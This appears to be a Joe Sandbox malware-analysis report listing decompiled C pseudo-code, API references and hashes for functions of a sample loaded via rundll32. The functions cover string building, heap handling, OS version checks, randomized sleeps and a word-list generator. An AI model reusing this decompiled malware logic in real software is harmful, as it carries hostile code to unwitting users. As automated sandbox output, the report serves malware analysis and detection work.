lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22AC
lstrlen.KERNEL32(00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22B4

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

strcpy.NTDLL ref: 045E22CB
lstrcat.KERNEL32(00000000,00000000), ref: 045E22D6

Part of subcall function 045E44D8: lstrlen.KERNEL32(00000000,00000000,045E3831,00000000,?,045E22E5,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E44E9

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22F3

Part of subcall function 045E17F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,045E22FF,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E17FA
Part of subcall function 045E17F0: _snprintf.NTDLL ref: 045E1858

Strings

=, xrefs: 045E22ED

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 54829793607780292d936b9f6baf9db7b78b602298ede905092a90beff606130
Instruction ID: dccf00b6bfd88fa0b0d4bbb089c98b0d6cc0204ffb39a801cbe41e62c05f43a7
Opcode Fuzzy Hash: 54829793607780292d936b9f6baf9db7b78b602298ede905092a90beff606130
Instruction Fuzzy Hash: 3611E337901226675B1ABBBBAC80C7F3AADBEDD6583154055F5049B200DA34FD02BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 045E3D80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E045E3D80(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x45ea3cc; // 0x4ff9600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x45ea3cc; // 0x4ff9600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x45ea030) {
					HeapFree( *0x45ea2d8, 0, _t8);
				}
				_t9 = E045E4076(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x45ea3cc; // 0x4ff9600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x045e3d80
0x045e3d80
0x045e3d89
0x045e3d99
0x045e3d99
0x045e3d9e
0x045e3da3
0x00000000
0x00000000
0x045e3d93
0x045e3d93
0x045e3da5
0x045e3da9
0x045e3dbb
0x045e3dbb
0x045e3dc6
0x045e3dcb
0x045e3dce
0x045e3dd3
0x045e3dd7
0x045e3ddd

APIs

RtlEnterCriticalSection.NTDLL(04FF95C0), ref: 045E3D89
Sleep.KERNEL32(0000000A), ref: 045E3D93
HeapFree.KERNEL32(00000000,00000000), ref: 045E3DBB
RtlLeaveCriticalSection.NTDLL(04FF95C0), ref: 045E3DD7

Strings

Uqt, xrefs: 045E3DBB

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: a52989bb3e97433a45620b6ea6676340494ffd4723645d79534c24e058603ad4
Instruction ID: 303b410d7afb4e5ff96e4622448c9957173e44812586edd2382f9c813c79cf74
Opcode Fuzzy Hash: a52989bb3e97433a45620b6ea6676340494ffd4723645d79534c24e058603ad4
Instruction Fuzzy Hash: EAF0FEB1200241ABE72C9F67ED48B667BE4FB44380B148414F946DF2A1D734EC48FB25

Uniqueness

Uniqueness Score: -1.00%

Function 045E10AD Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E045E10AD(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E045E39E3();
				if(_t21 != 0) {
					_t60 =  *0x45ea2fc; // 0x4000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x45ea2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x45ea178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E045E40F0( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x45ea348; // 0xa0d5a8
					if( *0x45ea2fc > 5) {
						_t8 = _t26 + 0x45eb5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x45eb9ef; // 0x44283a44
						_t27 = _t7;
					}
					E045E65DB(_t27, _t27);
					_t31 = E045E60A1(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E045E1F1D();
						 *0x45ea310 =  *0x45ea310 ^ 0x81bbe65d;
						 *0x45ea36c = _t32;
						_t33 = E045E7A71(0x60);
						 *0x45ea3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x45ea3cc; // 0x4ff9600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x45ea3cc; // 0x4ff9600
							 *_t52 = 0x45eb827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x45ea2d8, 0, 0x43);
							 *0x45ea368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x45ea2fc; // 0x4000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x45ea348; // 0xa0d5a8
								_t13 = _t59 + 0x45eb552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x45e927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E045E54EC( ~_v8 &  *0x45ea310,  &E045EA00C); // executed
								_t43 = E045E2792(0, _t56, _t64,  &E045EA00C); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E045E68F8(); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E045E517A(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E045E4F6E(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x45ea17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E045E5854(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x045e10ad
0x045e10b7
0x045e10ba
0x045e10bd
0x045e10c0
0x045e10c7
0x045e10c9
0x045e10d5
0x045e10d7
0x045e10d7
0x045e10e0
0x045e10e6
0x045e10eb
0x045e1105
0x045e1111
0x045e1113
0x045e1118
0x045e1122
0x045e1122
0x045e111a
0x045e111a
0x045e111a
0x045e111a
0x045e1129
0x045e1136
0x045e113d
0x045e1142
0x045e1142
0x045e114b
0x045e114e
0x045e1174
0x045e1179
0x045e1185
0x045e118a
0x045e118f
0x045e1194
0x045e1196
0x045e11c2
0x045e11c4
0x045e1198
0x045e119c
0x045e11a1
0x045e11a6
0x045e11ad
0x045e11b3
0x045e11b8
0x045e11be
0x045e11c5
0x045e11c7
0x045e11c9
0x045e11d8
0x045e11de
0x045e11e3
0x045e11e5
0x045e1215
0x045e1217
0x045e11e7
0x045e11e7
0x045e11ed
0x045e11fa
0x045e1200
0x045e1200
0x045e1208
0x045e1211
0x045e1218
0x045e121a
0x045e121c
0x045e1223
0x045e1230
0x045e1235
0x045e123a
0x045e123c
0x045e123e
0x00000000
0x00000000
0x045e1240
0x045e1245
0x045e1247
0x045e124e
0x045e1252
0x045e1255
0x045e126a
0x045e126e
0x045e1273
0x00000000
0x045e1273
0x045e1257
0x045e1259
0x00000000
0x00000000
0x045e1264
0x045e1266
0x045e1268
0x00000000
0x00000000
0x00000000
0x045e1268
0x045e124b
0x045e124b
0x045e121c
0x045e1150
0x045e1150
0x045e1155
0x045e1275
0x045e127a
0x045e1282
0x045e1282
0x00000000
0x045e127a
0x045e115b
0x045e115e
0x045e1168
0x045e116f
0x00000000
0x045e128a
0x045e128a
0x045e128d
0x045e1291
0x045e1291

APIs

Part of subcall function 045E39E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,045E10C5,00000001), ref: 045E39F2

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 045E1142

Part of subcall function 045E1F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 045E1F41
Part of subcall function 045E1F1D: wsprintfA.USER32 ref: 045E1FA5

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

memset.NTDLL ref: 045E119C
RtlInitializeCriticalSection.NTDLL(04FF95C0), ref: 045E11AD

Part of subcall function 045E4F6E: memset.NTDLL ref: 045E4F88
Part of subcall function 045E4F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 045E4FCE
Part of subcall function 045E4F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 045E4FD9

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 045E11D8
wsprintfA.USER32 ref: 045E1208

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 2c49581bb68365a321f0c75a899ed8202106e70e95434ec3a27d6766c7fb6a12
Instruction ID: 29cfc327c659f13099f5f18bcfddb40fd1359044dd9247e09f2f5ad1c8108243
Opcode Fuzzy Hash: 2c49581bb68365a321f0c75a899ed8202106e70e95434ec3a27d6766c7fb6a12
Instruction Fuzzy Hash: CE51C3B1A00625ABEB1C9BB3EC84B7E77A8FB48704F004865E501EB142E775BD48BB51

Uniqueness

Uniqueness Score: -1.00%

Function 045E3EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E045E3EE9(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E045E7A71(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E045E789E(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E045E7A71((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x45ea318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x045e3ef0
0x045e3ef7
0x045e3efc
0x045e3eff
0x045e3f06
0x045e3f09
0x045e3f0c
0x045e3f11
0x045e3f16
0x045e406a
0x045e406c
0x045e406e
0x045e4073
0x045e4073
0x045e3f1c
0x045e3f1f
0x045e3f22
0x045e3f24
0x045e3f24
0x045e3f28
0x00000000
0x00000000
0x045e3f2c
0x045e3f58
0x045e3f5d
0x045e3f5f
0x045e3f5f
0x045e3f62
0x045e3f65
0x045e3f65
0x045e3f67
0x00000000
0x045e3f32
0x045e3f34
0x045e3f53
0x045e3f53
0x045e3f6a
0x045e3f6a
0x045e3f6b
0x045e3f6b
0x045e3f6e
0x00000000
0x00000000
0x00000000
0x045e3f6e
0x045e3f38
0x045e3f7f
0x045e3f83
0x045e405d
0x045e405f
0x045e405f
0x045e4060
0x045e4063
0x00000000
0x045e4063
0x045e3f8c
0x045e3f9d
0x045e3fa1
0x045e4059
0x00000000
0x045e4059
0x045e3fa7
0x045e3faa
0x045e3fae
0x045e3fb2
0x045e3fb7
0x045e404f
0x045e404f
0x00000000
0x045e4055
0x045e3fc2
0x045e3fcb
0x045e3fdf
0x045e3fe6
0x045e3ffb
0x045e4001
0x045e4009
0x00000000
0x00000000
0x00000000
0x00000000
0x045e400b
0x045e400b
0x045e400b
0x045e4012
0x045e401a
0x00000000
0x00000000
0x045e401c
0x045e4025
0x00000000
0x00000000
0x00000000
0x045e4027
0x045e4029
0x045e402c
0x045e402c
0x045e402f
0x045e4033
0x045e4036
0x045e403c
0x045e403f
0x045e4046
0x00000000
0x045e3fc2
0x045e3f3d
0x045e3f45
0x045e3f4b
0x045e3f4d
0x045e3f4d
0x045e3f50
0x045e3f52
0x00000000
0x045e3f52
0x045e3f2c
0x045e3f72
0x045e3f77
0x045e3f79
0x045e3f79
0x045e3f7c
0x045e3f7c
0x00000000

APIs

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

lstrcpy.KERNEL32(69B25F45,00000020), ref: 045E3FE6
lstrcat.KERNEL32(69B25F45,00000020), ref: 045E3FFB
lstrcmp.KERNEL32(00000000,69B25F45), ref: 045E4012
lstrlen.KERNEL32(69B25F45), ref: 045E4036

Strings

, xrefs: 045E3F7F

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: bb2da86d7e6468a7884807e4c834868051e73a32eff63432902ca524df02ed08
Instruction ID: 9884446fd269eab5d07568f696befe220871b8d52e23f9022b90616f3f21faeb
Opcode Fuzzy Hash: bb2da86d7e6468a7884807e4c834868051e73a32eff63432902ca524df02ed08
Instruction Fuzzy Hash: E251B431A00108EBDF29CF9AD4846BDBBB6FF45354F158066EC659F202C774BA41EB80

Uniqueness

Uniqueness Score: -1.00%

Function 045E61FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E61FE(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E045E1CE6(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x45ea348; // 0xa0d5a8
				_t4 = _t24 + 0x45ebe30; // 0x4ff93d8
				_t5 = _t24 + 0x45ebdd8; // 0x4f0053
				_t26 = E045E3A53( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x45ea348; // 0xa0d5a8
						_t11 = _t32 + 0x45ebe24; // 0x4ff93cc
						_t48 = _t11;
						_t12 = _t32 + 0x45ebdd8; // 0x4f0053
						_t52 = E045E262D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x45ea348; // 0xa0d5a8
							_t13 = _t35 + 0x45ebe6e; // 0x30314549
							if(E045E3969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x45ea2fc - 6;
								if( *0x45ea2fc <= 6) {
									_t42 =  *0x45ea348; // 0xa0d5a8
									_t15 = _t42 + 0x45ebdba; // 0x52384549
									E045E3969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x45ea348; // 0xa0d5a8
							_t17 = _t38 + 0x45ebe68; // 0x4ff9410
							_t18 = _t38 + 0x45ebe40; // 0x680043
							_t45 = E045E187F(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x45ea2d8, 0, _t52);
						}
					}
					HeapFree( *0x45ea2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E045E1544(_t54);
				}
				return _t45;
			}

0x045e61fe
0x045e620e
0x045e6211
0x045e6218
0x045e621a
0x045e621a
0x045e621d
0x045e6222
0x045e6229
0x045e6236
0x045e623b
0x045e623f
0x045e624d
0x045e625b
0x045e625f
0x045e62f0
0x045e62f0
0x045e6265
0x045e6265
0x045e626a
0x045e626a
0x045e6271
0x045e627d
0x045e627f
0x045e6281
0x045e6283
0x045e628a
0x045e629c
0x045e629e
0x045e62a5
0x045e62a7
0x045e62ae
0x045e62b9
0x045e62b9
0x045e62a5
0x045e62be
0x045e62c3
0x045e62ca
0x045e62e8
0x045e62ea
0x045e62ea
0x045e6281
0x045e62fc
0x045e62fc
0x045e62fe
0x045e6303
0x045e6305
0x045e6305
0x045e6310

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FF93D8,00000000,?,7476F710,00000000,7476F730), ref: 045E624D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FF9410,?,00000000,30314549,00000014,004F0053,04FF93CC), ref: 045E62EA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,045E521B), ref: 045E62FC

Strings

Uqt, xrefs: 045E6253

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 6492f4517ef1be91ecb8403b0b7001ec108b09bb1258e48bbacd652031f447f7
Instruction ID: 67f94cd97f62993166113dffaf513a30209fe62ffe301c8079116fb2535bfd20
Opcode Fuzzy Hash: 6492f4517ef1be91ecb8403b0b7001ec108b09bb1258e48bbacd652031f447f7
Instruction Fuzzy Hash: 4D319072900219BFDB19DBA7EC84EAE3BB9FB58744F000065E600AB161D671BE48FB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E2689 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 045E26E6
SysAllocString.OLEAUT32(045E23DF), ref: 045E272A
SysFreeString.OLEAUT32(00000000), ref: 045E273E
SysFreeString.OLEAUT32(00000000), ref: 045E274C

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: c71f1a6d2860632594e51f8558b8d1a00ec9d7598a0232c50d9c3697f9bcf43b
Instruction ID: 1bb0bf39b3684594f9f452b51100da9f5c337e8675e1d10cbe189b2c6ad24cab
Opcode Fuzzy Hash: c71f1a6d2860632594e51f8558b8d1a00ec9d7598a0232c50d9c3697f9bcf43b
Instruction Fuzzy Hash: 8D3121B6900209EFCB09CF9AD4C48AE7BB9FF58340F10846EF5069B250D734A985DF61

Uniqueness

Uniqueness Score: -1.00%

Function 045E2CEC Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E045E2CEC(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L045E8406();
					_t34 = _t16 + _t13;
					_t17 = E045E4D24(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x045e2cf1
0x045e2cfc
0x045e2cfd
0x045e2cfd
0x045e2d09
0x045e2d12
0x045e2d15
0x045e2d19
0x045e2d1b
0x045e2d20
0x045e2d21
0x045e2d22
0x045e2d2c
0x045e2d2f
0x045e2d36
0x045e2d3a
0x045e2d41
0x045e2d47
0x045e2d51

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,045E72FE,?,?), ref: 045E2CFD
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,045E72FE,?,?), ref: 045E2D09
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 045E2D22

Part of subcall function 045E4D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 045E4DC3

Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,045E72FE,?,?), ref: 045E2D41

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 7652a8ef06847ffdf577ebbb11392bfb286e5ee382cc7823f1e1441c1abaa1ef
Instruction ID: 863722c7700df0f1893de52320ef84547a2641eb7cdae64faff0fa181b296cc3
Opcode Fuzzy Hash: 7652a8ef06847ffdf577ebbb11392bfb286e5ee382cc7823f1e1441c1abaa1ef
Instruction Fuzzy Hash: 51F0A4B7A40204BBD7189AA6DC19BEF76B9E7C4365F100124F602E7340E5B8AA059690

Uniqueness

Uniqueness Score: -1.00%

Function 045E4076 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E045E4076(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E045E7A71(_t20 << 2);
